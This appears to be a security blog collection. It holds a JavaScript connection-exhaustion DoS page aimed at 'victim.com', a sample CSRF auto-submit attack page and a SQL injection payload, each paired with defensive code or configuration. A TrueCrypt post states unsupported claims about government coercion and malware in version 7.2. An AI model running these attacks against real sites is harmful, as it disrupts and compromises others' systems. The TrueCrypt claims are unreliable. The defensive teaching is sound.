JavaScript Apache DDoS

Something quick to share with you before I forget it 🙂

<html><body>
<script>
  // Open 100 connections to the target's HTTP port. Each one is an FTP
  // handshake the web server never answers, so it sits there holding a
  // server worker until one side times out.
  for (var i = 0; i < 100; i++) {
    var img = new Image();
    var url = 'ftp://victim.com:80/?' + i; // unique query string so nothing is cached or merged
    img.src = url;
  }
</script>
</body></html>

I use ftp because HTTP is limited to about 6 simultaneous connections per host in most browsers, whereas ftp had no such limit at the time I wrote this post. Pointing the ftp:// URL at port 80 is the trick: the browser opens a TCP connection to the web server and waits for an FTP greeting that never comes, while the server holds a worker waiting for an HTTP request line that never comes either, so every connection is dead weight until a timeout fires. (Browsers have since dropped ftp:// support altogether, Chrome in version 88 and Firefox in version 90, so this exact trick no longer works in a current browser.)

Be sensible about how you use it!!!

(Original attack demonstration on BlackHat 2013, Las Vegas)
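As an added mitigation example that is not part of the original post: since each of these connections only hurts for as long as Apache keeps waiting for a request line, the practical defence is to make Apache stop waiting quickly. The directives below are real Apache httpd 2.4 directives (mod_reqtimeout ships with httpd); the values are assumptions chosen for a small site, not settings from the post.

```apache
# Added example, not from the original post. Apache httpd 2.4; values are assumptions.

# A client that connects and never sends a request line (the ftp:// trick above
# sends nothing, it is waiting for a greeting) is closed after 5 s of no header
# bytes. The window stretches to at most 10 s only while data arrives at
# >= 500 bytes/s, so a real slow client still gets through.
LoadModule reqtimeout_module modules/mod_reqtimeout.so
RequestReadTimeout header=5-10,MinRate=500 body=10,MinRate=500

# Bound every other read/write stall too; the stock default is 60 s, which is
# how long each idle connection would otherwise occupy a worker.
Timeout 15
KeepAliveTimeout 3
```

This caps how long each of the 100 connections costs you, not how many a single visitor of the attacking page can open; for that you want a per-client connection limit at the firewall or in a module such as mod_qos, sized to what your own pages legitimately need.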

CSRF attack

It's been a long time since I last blogged, but some of the things I took on were very time-consuming. Today we'll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. A page you happen to visit can make your browser send a request to another site where you are logged in; the browser attaches your cookies to it, so the site accepts the request as yours. It can drain your bank account balance or act on your behalf on a website without your consent, and without you even knowing about it until it's far too late.

However, if a website has taken precautions against this type of attack, such as per-session or one-time CSRF tokens embedded in its forms, the attack is rendered harmless: the attacker's page cannot read the token (the same-origin policy stops it), so the web server rejects the forged request sent from the 3rd-party site. Checking the Origin/Referer header of state-changing requests is a cheap second line of defence.

For more details one good article I spotted is on: https://www.acunetix.com/websitesecurity/csrf-attacks/
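To make the token defence concrete, here is an added example (my own code, not something from the post or from the linked article) of a synchronizer-token check with one-time tokens and an Origin check. The site origin, the dictionary-shaped session, and the form field names are assumptions made for the example; the attacker page is a constructed sample of the forgery.

```python
# Added example, not code from the original post: a synchronizer-token CSRF
# check. SITE_ORIGIN, the session layout and the form field names are
# assumptions made for this example.
import secrets

SITE_ORIGIN = "https://bank.example"  # assumed origin of the protected site


def issue_token(session):
    """Mint an unguessable token, store it server-side in the session and
    return it so the page can embed it in its form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def render_transfer_form(session):
    """The site's own form carries the token in a hidden field. An attacker's
    page cannot read this HTML (same-origin policy), so it cannot copy the
    token into a forgery."""
    token = issue_token(session)
    return (
        '<form method="POST" action="' + SITE_ORIGIN + '/transfer">'
        '<input type="hidden" name="csrf_token" value="' + token + '">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


# Constructed sample of the forgery: a page the victim merely visits. The
# browser submits it with the victim's bank cookies attached, but no token.
ATTACKER_PAGE = (
    '<form id="f" method="POST" action="' + SITE_ORIGIN + '/transfer">'
    '<input type="hidden" name="to" value="attacker">'
    '<input type="hidden" name="amount" value="1000"></form>'
    '<script>document.getElementById("f").submit()</script>'
)


def origin_allowed(headers):
    """Defence in depth: refuse requests whose Origin (or Referer) header
    names another site. A request carrying neither header is not trusted;
    it merely falls through to the token check."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return True
    return source == SITE_ORIGIN or source.startswith(SITE_ORIGIN + "/")


def check_csrf(session, headers, form):
    """Return True only for a request that carries the session's current
    token. The token is consumed on success (one-time), so a captured
    request cannot be replayed."""
    if not origin_allowed(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not isinstance(supplied, str):
        return False
    # Constant-time comparison so response timing leaks nothing about the token.
    if not secrets.compare_digest(expected.encode(), supplied.encode()):
        return False
    session["csrf_token"] = None
    return True
```

The forged request fails twice over: it has no token, and its Origin header names the attacker's site. Note that `startswith(SITE_ORIGIN + "/")` is deliberate; a bare prefix match would accept `https://bank.example.evil`.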

Aimilios


TrueCrypt no longer supported

Hello fellow security conscious citizens of the Internet!

On the 28th of May 2014 the TrueCrypt developers stopped support and development of their industry-leading encryption project "TrueCrypt", which provided strong encryption to thousands of computers, claiming they did so because Microsoft had ended Windows XP support.

Well that’s bollocks if you ask me 🙂

Governmental agencies probably found these so-called "anonymous" developers and either bribed or forced them to stop the development of TrueCrypt, since it stonewalled governments from obtaining digital data and building cases against criminals, or they were simply bought off; whatever the scenario, I highly doubt anyone with an average IQ believes the official TrueCrypt statement.

Now for the important part: alternatives to TrueCrypt? There are many of them, so there's no need to worry; just migrate from TrueCrypt to a similar OPEN-SOURCE application. One that is similar to TrueCrypt is DiskCryptor.

WARNING: In my opinion, don't even run or install TrueCrypt 7.2, because I believe it contains malware that could expose your data to the 3rd parties behind this security scandal.

Can my site be hacked?

The answer is yes, but let's clear a few things up below.

First of all, everything can be hacked, but in order to hack you the attacker first has to find a vulnerability, which takes time that few will spend unless you are specifically a target. The exception is automated scanning: bots probe every reachable site for known flaws in popular CMSs and plugins, so an unpatched site gets found without anyone targeting it.

Usual vulns/hacks/backdoors.

Usually hackers look for vulnerabilities in the PHP code your site runs, whether that is a popular CMS you downloaded or custom code written by you or by the company that built your site. A typical example is SQL injection, where attacker-controlled input read from $_GET or $_POST is pasted straight into a database query.
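The following is an added example of my own, not code from the post, showing the SQL injection just described against a throwaway in-memory SQLite database, next to the parameterised query that closes it. The users table, its columns and the two sample users are constructed for the example; the PHP string-concatenation pattern it mirrors is named in the comments.

```python
# Added example, not code from the original post: the SQL injection the post
# mentions, shown against an in-memory SQLite database with constructed rows.
# The users table, its columns and the sample users are assumptions.
import sqlite3


def make_db():
    """Build a throwaway database with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, is_admin) VALUES (?, ?)",
        [("alice", 1), ("bob", 0)],
    )
    return conn


def find_user_vulnerable(conn, username):
    """The flaw: request input is pasted into the SQL text. In PHP this is the
    familiar "WHERE username = '" . $_GET['user'] . "'" pattern."""
    sql = "SELECT id, username, is_admin FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """The fix: a bound parameter. The driver sends the value separately from
    the query text, so quotes in the input never change the query's meaning."""
    sql = "SELECT id, username, is_admin FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed attacker input: the first quote closes the intended string and
# the OR makes the WHERE clause true for every row in the table.
INJECTION = "x' OR '1'='1"


def demo():
    """Return (rows from the vulnerable query, rows from the safe query)
    for the injection payload. The vulnerable query hands back every user,
    admin included; the safe one looks for a user literally named
    "x' OR '1'='1" and finds nothing."""
    conn = make_db()
    return find_user_vulnerable(conn, INJECTION), find_user_safe(conn, INJECTION)
```

An honest username such as "alice" returns the same single row from both functions; only the parameterised version keeps behaving when the input carries SQL syntax.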

Most sites are hosted on shared servers. That doesn't necessarily mean that if I'm careless they can get into your site through mine, but it does happen from time to time, depending on how secure and isolated your account is: a shared server doesn't always mean shared configuration. It used to; nowadays most hosting companies don't allow global configs, and each account has its own security settings.

A backdoor can be anything: a stray file you left on your server, or something else entirely, for example a plugin you installed on your WordPress, Joomla or Drupal site.

The favourite attack is DDoS (distributed denial of service), which sends more traffic to your IP than your connection can absorb, slowing your site temporarily or cutting it off from the web completely. It usually remains reachable through some advanced panels or local connections. There are ways to protect yourself from DDoS: software, firewalls, or, in cases like banks, organizations like NASA, agencies and the like, dedicated hardware. Note this: nothing can protect you from 100,000,000 zombie computers attacking your network; even the CIA has been DDoSed and was offline for a day.

That's all for today!